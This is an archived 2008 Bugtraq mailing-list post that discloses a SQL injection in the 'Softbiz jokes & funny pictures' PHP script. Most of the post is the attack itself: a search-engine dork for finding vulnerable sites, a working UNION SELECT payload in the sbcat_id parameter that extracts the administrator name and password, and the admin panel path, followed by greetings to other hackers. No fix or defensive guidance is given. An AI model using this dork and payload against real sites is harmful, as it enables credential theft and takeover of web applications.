[<prev] [next>] [day] [month] [year] [list]
Message-ID: <84e00420802240043y3a40f096hd08cce0603d6bcb@mail.gmail.com>
Date: Sun, 24 Feb 2008 00:43:18 -0800
From: "Hamza Almersoumi" <xxmizoxx@...il.com>
To: bugtraq@...urityfocus.com
Subject: Softbiz jokes and funny pictures (index.php) sql injection
Script:Softbiz jokes & funny pictures
Author:-=Mizo=-
Dork:inurl:/index.php?sbcat_id=
Exploit:/index.php?sbcat_id=-1 union select
0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from
sbjks_admin/*
Admin cpanel:/path/admin
Greetz: L!0n - Red_casper - SoSo H H - DC - Iraqi_strike - Crack_man -
B0rizQ - Mahmood_ali - Net^Virus - iraqi_strike and all my friends!!
Powered by blists - more mailing lists